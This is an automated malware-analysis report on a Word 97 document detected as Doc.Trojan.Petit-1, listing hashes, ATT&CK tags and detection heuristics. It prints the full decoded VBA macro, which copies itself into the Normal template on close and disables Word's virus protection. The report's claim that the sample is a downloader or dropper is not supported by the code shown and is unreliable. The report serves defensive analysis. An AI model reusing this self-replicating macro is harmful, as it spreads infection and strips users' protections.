Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 10b109056d99439c…

MALICIOUS

Office (OLE)

26.0 KB Created: 2002-10-07 17:17:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 77d9602b32360d85e27d99f46ecb5371 SHA-1: 5d340b2473c9bad1a771f8a0ff13088f031b1254 SHA-256: 10b109056d99439cfeb5315cff9e0098827c222e37f6d4629abe7ce51f25a58f
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Petit-1'. It contains VBA macros that are obfuscated but appear to be designed to execute malicious code when the document is closed. The macro code attempts to modify the document's code modules and disable virus protection, suggesting it's a downloader or dropper for further malicious activity.

Heuristics 2

  • ClamAV: Doc.Trojan.Petit-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Petit-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 638 bytes
SHA-256: 898087acb61d2065c0238e69145547da99dd56855b9b218cbd9365563fa52a6e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
c = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 13)
With Documents(1).VBProject.VBComponents(1).CodeModule
.DeleteLines 1, .CountOfLines
.AddFromString c
End With
With NormalTemplate.VBProject.VBComponents(1).CodeModule
.DeleteLines 1, .CountOfLines
.AddFromString c
End With
Options.VirusProtection = 0
End Sub
'wm97.Petite by vlam